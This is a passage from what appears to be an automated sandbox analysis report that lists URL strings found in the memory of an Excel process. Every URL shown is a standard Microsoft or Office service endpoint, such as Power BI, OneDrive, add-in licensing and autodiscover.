    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryQ
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiQ
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech&
    Source: EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281589453.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com/3
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.comh
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appinfo/query=N(m
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.cortana.ai
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.ait
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com;
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comN
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/ntA
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netv
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comceK
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/imports;
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups%
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/S2b
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://augloop.office.com
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v278
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.751782101.000000001304F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.597933068.000000001304A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285417987.000000001305B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733903292.000000001304A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560518124.000000001305B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734760923.000000001304B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281097204.000000001305B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281291219.000000000F564000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
